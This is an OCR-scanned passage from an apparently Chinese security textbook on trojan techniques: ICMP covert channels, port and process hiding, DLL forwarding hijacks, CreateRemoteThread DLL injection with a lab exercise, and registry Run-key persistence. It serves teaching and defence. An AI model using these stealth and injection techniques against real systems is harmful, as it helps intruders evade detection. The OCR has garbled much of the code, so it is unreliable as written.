ECHO 和 ICMP_ECHOREPLY 报 文 来 进行 网 络 诊断 的 。 

实际 上 ,ICMP 木马 的 出 现 正 是 得 到 了 ping 程序 的 启发 ,由 于 ICMP 报 文 是 由 系统 内 
核 或 进程 直接 处 理 而 不 是 通过 端口 ,这 就 给 木马 一 个 摆脱 端口 的 绝 好 机 会 ,木马 将 自己 伪装 
成 一 个 ping 的 进程 ,系统 就 会 将 ICMP_ECHOREPLY(Ping 的 回 包 ) 的 监听 、 处 理 权 交 给 木 
马 进 程 ,一 旦 事先 约定 好 的 ICMP_ECHOREPLY 包 出 现 ( 可 以 判断 包 大 小 .ICMP_SEQ 等 
特征 ) ,木马 就 会 接受 ,分 析 并 从 报 文中 解码 出 命令 和 数据 。 

ICMP_ECHOREPLY 包 还 有 对 于 防火 墙 和 网 关 的 穿 透 能 力 。 对 于 防火 墙 来 说 ,ICMP 
报 文 被 列 为 危险 的 一 类 。 从 Ping of Death 到 ICMP 风暴 再 到 ICMP 碎片 攻击 ,构造 ICMP 
报 文 一 向 是 攻击 主机 的 最 好 方法 之 一 ,因此 一 般 的 防火 墙 都 会 对 ICMP 报 文 进行 过 滤 。 但 
是 ICMP_ECHOREPLY 报 文 却 往 往 不 会 在 过 滤 策 略 中 出 现 ,这 是 因为 一 旦 不 允许 ICMP_ 
ECHOREPLY 报 文通 过 就 意味 着 主机 没有 办 法 对 外 进行 ping 的 操作 ,这 样 对 于 用 户 是 极 
其 不 友好 的 。 如 果 设 置 正确 ,ICMP_ECHOREPLY 报 文 也 能 穿 过 网 关 , 进 入 局 域 网 。 

为 了 实现 发 送 /监听 ICMP 报 文 ,必须 建立 SOCK_RAW( 原 始 套 接口 )。 首 先 ,需要 定 
义 一 个 IP 头 部 和 一 个 ICMP 头 部 结构 。 

typedef struct iphdr { 
unsigned int version:4; // IP 版 本 号 ,4 表示 IPV4 


unsigned int h_len:4; // 4 位 首部 长 度 
unsigned char tos; // 8 位 服务 类 型 TOS 
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unsigned short total len; 

unsigned short ident; 

unsigned short frag and flags; 

unsigned char ttl; 

unsigned char proto; 

unsigned short checksum; 

unsigned int sourcelIP; 

unsigned int destIP; 
}IpHeader; 


typedef struct _ihdr { 

BYTE i_type; 

BYTE i_code; 

USHORT i_cksum; 

USHORT i_id; 

USHORT i seq; 

ULONG timestamp; 
}IcmpHeader; 


// 16 位 总 长 度 ( 字 节 ) 

//16 位 标识 

// 3 位 标志 位 

//8 位 生存 时 间 TTL 

// 8 位 协议 (TCP、UDP 或 其 他 ) 
// 16 位 IP 首部 校 验 和 

//32 位 源 地址 

//32 位 目的 IP 地 址 


//8 位 类 型 

//8 位 代码 

//16 位 校 验 和 

// 识 别 号 (一 般 用 进程 号 作为 识别 号 ) 
// 报 文 序列 号 

// 时 间 戳 


这 时 可 以 通过 WSASocket 建立 一 个 原始 套 接口 


SockRaw = WSASocket( AF_INET, // 协 议 族 
SOCK_RANW, // 协 议 类 型 ,SOCK_RAW 表示 是 原始 套 接口 
IPPROTO_ICMP, // 协 议 , IPPROTO_ICMP 表示 ICMP 数据 报 
NULL, //WSAPROTOCOL_INFO 置 空 
0 // 保 留 字 , 永 远 置 为 0 
WSA_FLAG OVERLAPPED // 为 了 使 用 发 送 接收 超时 设置 (设置 SO_RCVTIMEO, 


// SO_SNDTIMEO), 必须 将 标志 位 置 为 WSA_FLAG_OVERLAPPED. 


); 


随后 可 以 使 用 fill_icmp_data 子 程 序 填 充 ICMP 报 文 段 。 


void fill icmp data(char * icmp data, int datasize) 


IcmpHeader * icmp_hdr; 

char * datapart; 

icmp_hdr = (IcmpHeader * )icmp_data; 
icmp_ hdr ~—>i type = ICMP ECHOREPLY; 
icmp hdr ~->i code = 0; 


// 类 型 为 ICMP_ECHOREPLY 


icmp_hdr ->i id = (USHORT)GetCurrentProcessId(); // 识 别 号 为 进程 号 


icmp_hdr ~>i cksum = 0; 
icmp hdr ->i seq = 0; 


// 校 验 和 初始 化 
// 序 列 号 初始 化 


datapart = icmp data + sizeof(IcmpHeader); 


// 数 据 端的 地 址 为 icmp 报 文 地 址 加 上 ICMP 的 首部 长 度 


memset(datapart, "A", datasize - sizeof(IcmpHeader)); // 这 里 填充 的 数据 全 部 为 "A", 读 者 可 
// 以 填充 任何 代码 和 数据 ,实际 上 木马 和 控制 端 之 间 就 是 通过 数据 段 传递 数据 的 


上 


接着 ,再 使 用 CheckSum 子 程序 计算 ICMP 校 验 和 。 


AS 
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((IcmpHeader * )icmp data) 一 > i cksum 
= checksum( (USHORT * )icmp data, datasize); 
USHORT CheckSum (USHORT * buffer, int size) 
{ 
unsigned long cksum = 0; 
while(size >1) 
{ 
cksum+= # buffert++; 
size 一 = sizeof(USHORT); 
if(size ) cksum +=* (UCHRR * )buffer; 
cksum= (cksum >> 16) + (cksum & Oxffff); 
cksum += (cksum >> 16); 
return (USHORT) (一 cksum) 
} // CheckSum 函数 是 标准 的 校 验 和 函数 ,也 可 以 用 优化 过 的 任何 校 验 和 函数 来 代替 它 


随后 ,就 可 以 通过 sendto 函数 发 送 ICMP_ECHOREPLY 报 文 。 


sendto( sockRaw, icmp_data, datasize, 0, (struct sockaddr * )&dest, sizeof(dest)); 


作为 服务 端的 监听 程序 ,基本 的 操作 相同 ,只 是 需要 使 用 recvfrm 函数 接收 ICMP_ 
ECHOREPLY 报 文 并 用 decoder 函数 将 接收 来 的 报 文 解码 为 数据 和 命令 。 


recv_icmp= recvfrom( sockRaw, recvbuf, MAX_ PACKET, 0, (struct 
sockaddr * )&from, &fromlen); 
decode_resp(recvbuf, recv_icmp, &from); 


decoder 函数 : 


void decoder(char * buf, int bytes, struct sockaddr in * from) 
{ 

IpHeader * iphdr; 

IcmpHeader * icmphdr; 

unsigned short iphdrlen; 


iphdr = (IpHeader * )buf; // 了 首部 的 地 址 就 等 于 buf 的 地 址 

iphdrlen = iphdr ~->h len * 4; // 因为 h_len 是 32 位 Word, 要 转换 成 bytes 必须 乘 以 4 
icmphdr = (IcmpHeader * ) (buf + iphdrlen); //ICMP 首部 的 地 址 等 于 IP 首部 长 度 加 buf 
printf(" %d bytes from %s:",bytes, inet_ntoa(from—> sin_addr)); // 取 出 源 地 址 
printf(" icmp id= %d. ",icmphdr — >i id); // 取 出 进程 号 
printf(" icmp_ seq= %d. ",icmphdr — > i seq); // 取 出 序列 号 
printf(" icmp type= %d",icmphdr — >i type); // 取 出 类 型 
printf(" icmp code= %d",icmphdr —> i code); // 取 出 代码 


for(i=0;i< ICMP DATA SIZE;I++) printf("%c", * (buf +iphdrlen+i+12)); // 取 出 数据 段 
} 


对 于 ICMP 木马 ,除非 使 用 嗅 探 器 或 者 监视 Windows 的 SockAPI 调用 ,否则 ,很 难 发 
现 木 马 的 行踪 。 如 果 想 阻止 ICMP 木马 ,就 必须 过 滤 ICMP 报 文 , 对 于 Windows 2000 可 以 
使 用 系统 自 带 的 路 由 功能 对 ICMP 协议 进行 过 滤 。Windows 2000 的 Routing & Remote 
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Access 功能 十 分 强大 ,其 中 之 一 就 是 建立 一 个 TCP/IP 协议 过 滤器 。 不 过 值得 注意 的 是 ， 
一 旦 在 输入 过 滤器 中 禁止 了 ICMP_ECHOREPLY 报 文 ,就 无 法 再 用 Ping 这 个 工具 了 。 如 
果 过 滤 了 所 有 的 ICMP 报 文 , 就 收 不 到 任何 错误 报 文 , 当 使 用 IE 访问 一 个 并 不 存在 的 网 站 
时 ,往往 要 花 数 倍 的 时 间 才 能 知道 结果 ,而且 基 于 ICMP 协议 的 tracert 工具 也 会 失效 ,这 也 
是 方便 和 安全 之 间 的 矛盾 的 统一 。 

3. 隐藏 端口 

端口 是 木马 最 大 的 漏洞 ,经 过 不 断 宣传 ,现在 连 一 个 刚刚 上 网 没有 多 久 的 新 手 也 知道 用 
NETSTAT 查看 端口 。 放 弃 了 端口 后 木马 怎么 和 控制 端 联络 呢 ? 对 于 这 个 问题 ,不 同 的 木 
马 采用 了 不 同 的 方法 ,大 致 分 为 寄生 和 潜伏 。 

寄生 就 是 找 一 个 已 经 打开 的 端口 寄生 其 上 ,平时 只 是 监听 , 遇 到 特殊 的 指令 就 解释 执 
行 。 因 为 木马 实际 上 是 寄生 在 已 有 的 系统 服务 之 上 的 ,因此 ,在 扫描 或 查看 系统 端口 的 时 候 
是 没有 任何 异常 的 。 据 作者 所 知 , 在 Windows 98 下 进行 这 样 的 操作 是 比较 简单 的 ,但 是 对 
于 Windows 2000 要 麻烦 得 多 。 感 兴趣 的 读者 可 以 进一步 研究 。 

潜伏 是 使 用 IP 协议 族 中 的 其 他 协议 而 不 是 TCP 或 UDP 来 进行 通信 ,从 而 瞒 过 
Netstat 和 端口 扫描 软件 。 一 种 比较 常见 的 潜伏 手段 是 使 用 ICMP 协议 。 

除了 寄生 和 潜伏 之 外 ,木马 还 有 其 他 更 好 的 方法 进行 端口 隐藏 ,比如 直接 针对 网 卡 或 
Modem 进行 底层 的 编程 ,这 涉及 更 高 的 编程 技巧 。 

4. Windwos NT 系统 下 木马 进程 的 隐藏 

在 Windows 9x 中 ,只 需要 将 进程 注册 为 系统 服务 就 能 够 从 进程 查看 器 中 隐形 ,可 是 这 
一 切 在 Windows NT 中 却 完 全 不 同 , 无 论 木马 从 端口 .启动 文件 上 如 何 巧妙 地 隐藏 自己 , 始 
终 都 不 能 欺骗 Windows NT 的 任务 管理 器 ,难道 在 Windows NT 下 木马 真 的 再 也 无 法 隐藏 
自己 的 进程 了 ? 

在 Windows 系统 下 ,可 执行 文件 主要 是 EXE 和 COM 文件 ,这 两 种 文件 在 运行 时 都 有 
一 个 共同 点 : 会 生成 一 个 独立 的 进程 。 寻 找 特定 进程 是 发 现 木 马 的 方法 之 一 (无 论 手动 还 
是 防火 墙 ), 随 着 入侵 检测 软件 的 不 断 发 展 ,关联 进程 和 SOCKET 已 经 成 为 流行 的 技术 (如 
著名 的 FPort 就 能 够 检测 出 任何 进程 打开 的 TCP/UDP 端口 ) ,假设 一 个 木马 在 运行 时 被 检 
测 软件 同时 查 出 端口 和 进程 ,基本 上 认为 这 个 木马 的 隐藏 已 经 完全 失败 (利用 心理 因素 而 非 
技术 手段 欺骗 用 户 的 木马 不 在 此 讨论 范围 之 内 ) 。 正 常情 况 下 ,Windows NT 用 户 进程 对 于 
系统 管理 员 来 说 都 是 可 见 的 ,要 想 做 到 木马 的 进程 隐藏 ,有 两 个 思路 : 第 一 个 是 让 系统 管理 
员 看 不 见 (或 者 视而不见 ) 进 程 ; 第 二 个 是 不 使 用 进程 。 

让 系统 管理 员 看 不 见 进程 的 方法 就 是 进行 进程 列表 欺骗 。 为 了 了 解 如 何 看 不 见 进程 ， 
首先 要 了 解 怎样 能 看 得 见 进程 。 在 Windows 中 有 多 种 方法 能 够 看 到 进程 的 存在 。 例 如 PS 
API(Process Status AP1) .PDH(Performance Data Helper) 和 ToolHelp API。 如 果 能 够 其 
骗 用 户 和 入 侵 检测 软件 来 查看 进程 的 函数 (如 截获 相应 的 API 调用 ,替换 返回 的 数据 ) ,就 
完全 能 实现 进程 隐藏 。 但 是 首先 并 不 知道 用 户 和 入 侵 检 测 软件 使 用 的 是 什么 方法 来 查看 进 
程 列表 ,其 次 如 果 有 权限 和 技术 实现 这 样 的 欺骗 ,就 一 定 能 使 用 其 他 方法 更 容易 地 实现 进程 
的 隐藏 。 

第 二 种 方法 是 不 使 用 进程 。 不 使 用 进程 使 用 什么 ? 为 了 和 弄 明白 这 个 问题 ,必须 要 先 了 
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解 Windows 系统 的 另 一 种 可 执行 文件 DLL。DLL 是 Dynamic Link Library( 动 态 链接 库 ) 
的 缩写 , 它 是 Windows 的 基础 ,因为 所 有 的 API 函数 都 是 在 DLL 中 实现 的 。DLL 文件 没 
有 程序 逻辑 ,由 多 个 功能 函数 构成 , 它 并 不 能 独立 运行 ,一 般 都 是 由 进程 加 载 并 调用 的 。 因 
为 DLL 文件 不 能 独立 运行 ,所 以 在 进程 列表 中 并 不 会 出 现 DLL。 假 设 编写 了 一 个 木马 
DLL, 并 且 通 过 别 的 进程 来 运行 它 ,那么 无 论 是 入 侵 检测 软件 还 是 在 进程 列表 中 ,都 只 会 出 
现 那个 进程 而 并 不 会 出 现 木马 DLL, 如 果 那 个 进程 是 可 信 进 程 (如 资源 管理 器 Explorer. 
exe, 没 人 会 怀疑 它 是 木马 吧 ) ,那么 我 们 编写 的 DLL 作为 进程 的 一 部 分 ,也 将 成 为 被 信赖 的 
一 员 而 为 所 欲 为 。 在 木马 中 ,有 3 种 使 用 DLL 的 方式 。 

1) 最 简单 的 方式 

运行 DLL 文件 最 简单 的 方法 是 利用 Rundll. exe/Rundll32. exe。Rundll/Rundll32 是 
Windows 自 带 的 动态 链接 库 工具 ,可 以 用 来 在 命令 行 下 执行 动态 链接 库 中 的 某 个 函数 ,其 
中 Rundll 是 16 位 而 Rundll32 是 32 位 的 (分 别 调用 16 位 和 32 位 的 DLL 文件 )。Rundll32 
的 使 用 方法 如 下 。 


Rund1132 DllFileName FuncName 


如 果 编 写 了 一 个 MyDll. dll, 这 个 动态 链接 库 中 定义 了 一 个 MyFunec 的 函数 ,那么 通过 
下 列 命令 就 可 以 执行 MyFunc 函数 的 功能 。 


Rund1132. exe MYD11. dll MyFunc 


假设 在 MyFunec 函数 中 实现 了 木马 的 功能 ,那么 就 可 以 通过 Rundll32 来 运行 这 个 木马 
了 。 在 系统 管理 员 看 来 ,进程 列表 中 增加 的 是 Rundll32. exe 而 并 不 是 木马 文件 ,这 样 也 算 
是 木马 的 一 种 简易 欺骗 和 自我 保护 方法 (至 少 不 能 把 Rundll32. exe 删 掉 , 想 从 Rundll32 进 
程 找到 DLL 木马 还 是 有 一 点 麻烦 的 )。 

2) 比较 高 级 的 方式 

这 种 方法 的 本 质 思想 是 使 用 假 的 DLL( 即 欺骗 DLL) 来 代替 原来 的 DLL 文件 。 由 于 应 
用 程序 在 寻找 DLL 时 会 根据 特定 规则 在 不 同 目录 下 按 序 寻 找 , 这 就 给 欺骗 DLL 提供 了 
可 能 。 

欺骗 DLL 的 工作 原理 为 : 当 应 用 程序 需要 访问 正常 DLL 的 某 个 函数 时 ,其 实 是 访问 
了 欺骗 DLL 的 同名 函数 。 因 此 , 当 欺 骗 DLL 被 访问 时 , 它 将 通过 函数 转发 器 将 正常 的 调用 
转发 给 原 DLL, 而 截获 并 处 理 和 木马 相关 的 特定 消息 。 例 如 ,大 家 知道 Windows 的 
Socketl. x 的 函数 都 是 存放 在 wsock32. dll 中 的 ,那么 自己 写 一 个 wsock32. dll 文件 替换 掉 
原先 的 wsock32. dll( 将 原先 的 DLL 文件 重 命名 为 wsockold. dll) 。 用 来 欺骗 用 户 的 
wsock32. dll 只 做 两 件 事 : 一 是 如 果 遇 到 常规 调用 ,就 直接 转发 给 wsockold. dll( 使 用 函数 
转发 器 forward); 二 是 遇 到 特殊 的 请 求 ( 事 先 约定 的 ) 就 解码 并 处 理 。 这 样 理 论 上 只 要 木马 
编写 者 通过 SOCKET 远程 输入 一 定 的 暗号 ,就 可 以 控制 wsock32. dll( 木 马 DLL) 做 任何 操 
作 。 欺 骗 DLL 技术 也 是 比较 老 的 技术 ,因此 微软 也 对 此 做 了 相当 多 的 防范 ,在 Windows 的 
system32 目录 下 有 一 个 dllcache 的 目录 ,这 个 目录 中 存放 着 大 量 的 DLL 文件 和 一 些 重要 的 
EXE 文件 ,这 是 微软 用 来 保护 DLL 的 法 宝 ,一旦 操作 系统 发 现 被 保护 的 DLL 文件 被 算 改 ， 
它 就 会 自动 从 dllcache 中 恢复 这 个 文件 。 虽然 说 有 种 种 方法 可 以 绕 过 DLL 保护 (例如 , 先 
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更 改 dllcache 目录 中 的 备份 再 修改 DLL 文件 ,或 者 利用 KnownDLLs 键 值 更 改 DLL 的 默 
认 启 动 路 径 等 ) ,但 是 未 来 微软 必 将 更 加 小 心地 保护 重要 的 DLL 文件 。 同 时 由 于 欺骗 DLL 
方法 本 身 有 着 一 些 漏洞 (例如 ,修复 安装 .安装 补丁 .升级 系统 和 检查 数字 签名 等 方法 都 有 可 
能 导致 特洛伊 DLL 失效 ) ,因此 这 个 方法 也 不 能 算是 DLL 木马 的 最 优选 择 。 

(1) 函数 转发 器 。 函 数 转发 器 (Forward) 的 主要 应 用 在 动态 链接 库 中 ,目的 是 实现 函数 
的 转发 。 当 需要 实现 的 函数 已 经 在 其 他 动态 链接 库 中 实现 过 时 ,就 不 必 再 在 当前 动态 链接 
库 实 现 一 遍 了 ,而 是 通过 Forward 功能 直接 使 用 另 一 个 库 中 的 函数 就 可 以 了 。 在 Windows 
自 带 的 核心 动态 链接 库 中 ,有 很 多 转发 现象 。 

输入 如 下 命令 。 


Visual Studio 7 命令 提示 符 > 
dumpBin — Exports c:\windows\system32\Kernel32.dll | more 


其 运行 结果 如 图 5-5 所 示 。 可 以 看 到 kernel32. dll 中 的 一 个 函数 AcquireSRWLockExclusive 
就 是 一 个 转发 函数 。 但 用 户 应 用 程序 调用 kernel32. dll 中 的 这 个 函数 ,实际 上 是 调用 了 NTDLL. 
dll 中 的 AcquireSRWLockExclusive。 可 见 该 函数 的 具体 实现 是 在 NTDLL. dll 文件 中 ， 


lx 
1364 
1364 number of na 


ordinal hint RUA name 


3 9 AcquireSRWYLockExc lusive 《forwarded to NTDLL.Rtlhcquire 
SRWLockExc lus ive> 
奏章 AcquireSRWLockShared (forwarded to NIDLL.RtlAcquireSRY| 
LockShared) 
2 9806453AD ActivateActCtx 
3 G063737D AddAtonA 
4 9B942EDD hddhtomW 
5 G00AB604 hddConsolehliash 
6 999hB598 AddConsolefliasy 
? hddDl1Directory (forwarded to api-ms-win-core-library]| 
pader-11-1-9.AddDllDirectory》 
8 9B998FFBC hddIntegrityLabelToBoundaryDescriptor 
9 99986783 hddLocalhlternateComnputerNameh 
A 99986698 hddLocalhlternateComnputerNamey 
B 9993C69F hddRefhctCtx 
C 999366B9 hddSIDToBoundaryDescriptor 
D 99698D198 AddSecureMenoryCacheCallback 
E hddUectoredContinueHandler 《forwarded to NTDLL-Rtlhddu 
ctoredContinueHandler》 
18 F AddUectoredExceptionHandler ‘forwarded to NIDLL.Rt1Add| 
ectoredExceptionHandler》 
— More ”一 


图 5-5 Windows 7 系统 DLL 的 转发 现象 


(2) 在 程序 中 实现 函数 转发 。 如 果 写 自己 的 动态 链接 库 程序 时 需要 引用 第 三 方 动态 链 
接 库 中 的 函数 ,也 可 以 使 用 转发 函数 。 具 体 的 实现 代码 如 下 。 


#pragma comment (linker, "/export:ForwardFunc = Kernel32. HeapCreate") 

这 句 代 码 的 意思 就 是 在 自己 的 动态 链接 库 中 导出 了 一 个 名 称 为 ForwardFunc 的 函数 ， 
但 这 个 函数 在 源 代码 中 没有 具体 实现 。 其 具体 实现 在 kernel32. dll 中 。 上 述 语 句 的 实现 效 
果 如 图 5-6 所 示 。 图 中 倒数 第 2 行 就 是 转发 情况 的 显示 。 
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:\Progran Files\Microsoft Visual Studio 9.6WC>dunpBin -Exports E:\guangpan\oth| 
ercode \testdll\Debug\testdl1.d1l 

icrosoft CR> COFF/PE Dunper Version 9.80.21622.88 

opyright 《C》 Microsoft Corporation. All rights reserved. 


Dunp of file E:\guangpan\othercode\testdll\Debug\testd11.d1l 


Pile Type: DLL 
Section contains the following exports for testdll.dll 


990B9998 characteristics 
47182FB6 tine date stanp Sat Oct 13 19:38:46 2887 
日 -9B ion 
1 ordinal base 
2 nunher of functions 
2 nunber of nanes 


ordinal hint RUA nane 


a ForwardFunc (forwarded to Kernel32.HeapCreate) 
， 1 68998196n display = CILT+5(_display》 


5-6 ”Forward 函数 的 实现 

3) 最 高 级 的 方式 

DLL 木马 的 最 高 境界 是 动态 嵌入 技术 ,动态 嵌入 技术 指 的 是 将 自己 的 代码 嵌入 正在 运 
行 的 进程 中 的 技术 。 理 论 上 来 说 ,在 Windows 中 的 每 个 进程 都 有 自己 的 私有 内 存 空间 , 别 
的 进程 是 不 允许 对 这 个 私有 空间 进行 操作 的 ,但 是 实际 上 ,仍然 可 以 利用 多 种 方法 进入 并 操 
作 进 程 的 私有 内 存 。 在 多 种 动态 嵌入 技术 中 (窗口 Hook、 挂 接 API、 远 程 线 程 ), 较 受 欢 迎 
的 是 远程 线程 技术 ,这 种 技术 非常 简单 ,只 要 掌握 基本 的 进程 线程 和 动态 链接 库 的 知识 就 
可 以 很 轻松 地 完成 角 入 。 下 面 就 为 大 家 介绍 一 下 远程 线程 技术 ， 

5. 远程 线程 技术 

远程 线程 技术 指 的 是 通过 在 另 一 个 进程 中 创建 远程 线程 的 方法 进入 那个 进程 的 内 存 地 
址 空间 。 在 进程 中 ,可 以 通过 CreateThread 函数 创建 线程 ,被 创建 的 新 线程 与 主线 程 (就 是 
进程 启动 时 被 同时 自动 建立 的 那个 线程 ) 共 享 地 址 空间 以 及 其 他 的 资源 。 但 是 很 少 有 人 知 
道 ,通过 CreateRemoteThread 也 同样 可 以 在 另 一 个 进程 内 创建 新 线程 ,新 线程 同样 可 以 共 
享 远程 进程 的 地 址 空间 ,所 以 通过 一 个 远程 线程 进入 远程 进程 的 内 存 地 址 空间 ,也 就 拥有 了 
那个 远程 进程 相同 的 权限 。 例 如 ,在 远程 进程 内 部 启动 一 个 DLL 木马 (与 进入 进程 内 部 相 
比 ,启动 一 个 DLL 木马 相当 容易 ,实际 上 可 以 随意 算 改 那个 远程 进程 的 数据 )。 

首先 ,OpenProcess 来 打开 试图 做 入 的 进程 (如 果 远 程 进程 不 允许 打开 ,那么 嵌入 就 无 
法 进行 了 ,这 往往 是 由 于 权限 不 足 引 起 的 ,解决 方法 是 通过 种 种 途径 提升 本 地 进程 的 权限 ) 。 


hRemoteProcess = OpenProcess(PROCESS CREATE THREAD | // 允 许 远程 创建 线程 
PROCESS_VM_OPERATION | // 允 许 远程 加 操作 
PROCESS_VM_WRITE, // 允 许 远程 开 写 


FALSE, dwRemoteProcessId ) 


由 于 后 面 需要 写 和 远程 进程 的 内 存 地 址 空间 并 建立 远程 线程 ,因此 还 需要 申请 足够 的 
权限 (PROC CREATE_ THREAD.VM_ OPERATION.VM_WRITE)., 

然后 ,可 以 建立 LoadLibraryW 函数 这 个 线程 来 启动 DLL 木马 。LoadLibraryW 函数 
是 在 Kernel32. dll 中 定义 的 ,用 来 加 载 DLL 文件 , 它 只 有 一 个 参数 。 这 个 参数 就 是 DLL 文 
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件 的 绝对 路 径 名 pszLibFileName( 也 就 是 木马 DLL 的 全 路 径 文件 名 ) ,但 是 由 于 木马 DLL 
是 在 远程 进程 内 调用 的 ,因此 还 需要 首先 将 这 个 文件 名 复制 到 远程 地 址 空间 (否则 远程 线程 
是 无 法 读 到 这 个 参数 的 )。 


// 计 算 DLL 路 径 名 需要 的 内 存 空间 
int cb= (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
// 使 用 VirtualAllocEx 函数 在 远程 进程 的 内 存 地 址 空间 分 配 DLL 文件 名 缓冲 区 
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, 
MEM_COMMIT, PAGE READWRITE); 

// 使 用 WriteProcessMemory 函数 将 DLL 的 路 径 名 复制 到 远程 进程 的 内 存 空间 
iReturnCode = WriteProcessMemory(hRemoteProcess, 

pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 


// 计 算 LoadLibraryW 的 入 口 地 址 
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ ROUTINE) 
GetProcAddress(GetModuleHandle( TEXT("Kernel32")), "LoadLibraryW" ); 


通过 建立 远程 线程 时 的 地 址 pfnStartAddr( 实 际 上 就 是 LoadLibraryW 的 入 口 地 址 ) 和 
传递 的 参数 pszLibFileRemote( 实 际 上 是 复制 过 去 的 木马 DLL 的 全 路 径 文件 名 ) 在 远程 进 
程 内 启动 木马 DLL。 


// 启 动 远程 线程 LoadLibraryW, 通过 远程 线程 调用 用 户 的 DLL 文件 
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, 
pfnStartAddr, pszLibFileRemote, 0, NULL); 


至 此 ,远程 嵌入 顺利 完成 ,为 了 试验 DLL 是 不 是 已 经 正常 在 远程 线程 运行 , 特 编写 了 以 
下 的 测试 DLL。 


BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved) 
{ 
char szProcessId[64] ; 
switch ( reason ) 
{ 
case DLL_ PROCESS ATTACH: 


{ 
// 获 取 当 前 进程 世 
_itoa ( GetCurrentProcessId(), szProcessId, 10 ); 
MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK ); 
b 
default: 
return TRUE; 
. 


当 使 用 程序 将 这 个 TestDLL. dll 嵌入 Explorer. exe 进程 后 (PID 王 1208) ,该 测试 DLL 
弹出 了 1208 字样 的 确认 框 ,同时 使 用 PS 工具 也 能 看 到 。 


Process ID: 1208 
C:\WINNT\Explorer. exe (0x00400000) 


C:\TestDLL. dll (0x100000000) 
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这 证 明 TestDLL. dll 已 经 在 Explorer. exe 进程 内 正确 地 运行 了 。 
无 论 是 使 用 特洛伊 DLL 还 是 使 用 远程 线程 ,都 是 让 木马 的 核心 代码 运行 于 另外 一 个 进 
程 的 内 存 空间 ,这 样 不 仅 能 很 好 地 隐藏 自己 ,也 能 更 好 地 保护 自己 。 


5.3.4 远程 线程 插入 实验 


【实验 目的 】 
掌握 远程 线程 插入 的 基本 原理 。 
【实验 环境 】 


(1) Windows 32 位 操作 系统 。 

(2) Visual Studio 6. 0 编译 环境 。 

【实验 步骤 】 

(1) 资源 获取 。 从 网 上 下 载 文 件 中 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 
配套 素材 日 录 \Experiment\thread\ImgWalk; 本 书 配 套 素材 目录 \Experiment\thread\ 
InjLib)。 

(2) 资源 说 明 。ImgWalk 实现 了 一 个 动态 链接 库 , 这 个 动态 链接 库 就 是 我 们 准备 插入 
其 他 进程 空间 中 的 dll。 它 的 功能 是 罗列 出 被 插入 进程 的 进程 空间 中 装载 了 哪些 核心 dll 及 
模块 。 

InjLib 是 一 个 可 执行 程序 ,该 程序 负责 把 ImgWalk. dll 插入 第 三 方 进程 空间 中 。 于 是 ， 
ImgWalk. dll 便 在 第 三 方 进程 空间 中 执行 了 ,并 依据 ImgWalk. dll 的 功能 列 出 了 第 三 方 进 
程 加 载 的 核心 模块 。 

(3) 编译 ImgWalk 工程 。 

(4) 编译 InjLib 工程 。 

(5) 打开 第 三 方 进程 。 本 例 中 打开 了 IE 浏览 器 ,查找 到 其 PID 为 xxx。 

(6) 用 InjLib. exe 把 ImgWalk. dll 插入 IE 中 。 

【实验 注意 事项 】 

程序 的 设计 思路 参考 附 书 PPT。 


5.3.5 其 他 技术 


1. Socket 技术 

计算 机 通信 的 基石 是 套 接 字 ,一 个 套 接 字 端口 是 通信 的 一 端 。 在 这 一 端 上 可 以 找到 与 
其 对 应 的 一 个 名 称 。 一 个 正在 被 使 用 的 套 接 字 都 有 它 的 类 型 和 与 其 相关 的 进程 。 套 接 字 存 
在 于 通信 域 中 ,通信 域 是 为 了 处 理 一 般 的 线程 通过 套 接 字 通 信 而 引进 的 一 种 抽象 概念 。 套 
接 字 通常 和 同一 个 域 中 的 套 接 字 交 换 数据 (数据 交换 也 可 能 穿越 域 的 界限 ,但 这 时 一 定 要 执 
行 某 种 解释 程序 ) 。Windows Sockets 规范 支持 单一 的 通信 域 , 即 Internet 域 。 使 用 这 个 域 
的 各 种 进程 互相 之 间 用 Internet 协议 来 进行 通信 (Windows Sockets 1.1 以 上 的 版 本 支持 其 
他 的 域 ) 。 

2. 修改 注册 表 

经 常 研究 注册 表 的 读者 一 定 知道 ,在 注册 表 中 是 可 以 设置 一 些 启动 加 载 项 目的 ,编制 木 
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马 程序 的 高 手 们 当然 不 会 放 过 这 样 的 机 会 ,况且 他 们 知道 修改 注册 表 会 更 安全 ,因为 会 查看 
并 且 编 辑 注册 表 的 人 很 少 。 事 实 上 ，Run、RunOnce、RunOnceEx、RunServices 以 及 
RunServicesOnce 等 都 可 能 是 木马 程序 加 载 的 入 口 。 

为 了 使 操作 系统 运行 得 更 为 稳定 ,微软 在 Windows 95 及 其 后 继 版 本 中 ,推出 了 一 种 称 
为 “注册 表 ” 的 数据 库 ,将 设备 及 应 用 程序 的 信息 资源 与 配置 信息 进行 集中 管理 。 注 册 表 包 
括 以 下 几 个 根 键 。 

(1) HKEY_CLASSES ROOT: 此 处 存储 的 信息 可 以 确保 当 使 用 Windows 资源 管理 
器 打开 文件 时 ,将 使 用 正确 的 应 用 程序 打开 对 应 的 文件 类 型 。 

(2) HKEY_CURRENT_USER: 存放 当前 登录 用 户 的 有 关 信 息 。 用 户 文件 夹 .屏幕 颜 
色 和 “控制 面板 "设置 都 存储 在 此 处 。 该 信息 称 为 用 户 配 置 文件 。 

(3) HKEY_LOCAL_MACHINE: 包含 针对 该 计算 机 (对 于 任何 用 户 ) 的 配置 信息 。 

(4) HKEY_USERS: 存放 计算 机 上 所 有 用 户 的 配置 文件 。 

(5) HKEY_CURRENT_CONFIG: 包含 本 地 计算 机 在 系统 启动 时 所 用 的 硬件 配置 文 
件 信息 。 

(6) HKEY_DYN_DATA: 记录 系统 运行 时 刻 的 状态 。 

注册 表 按 层次 结构 来 组 织 ,6 个 分 支 名 都 以 HKEY 开头 , 称 为 主键 (Key) ,这 与 资源 管 
理 器 中 的 文件 夹 相似 ,表示 主键 的 图 标 与 文件 夹 的 图 标 一 样 。 每 个 主键 图 标的 左边 有 一 个 
“十 ”图 标 , 单 击 可 将 这 一 分 支 展开 ,展开 后 可 以 看 到 主键 还 包含 次 级 主键 (SubKey)。 当 单 
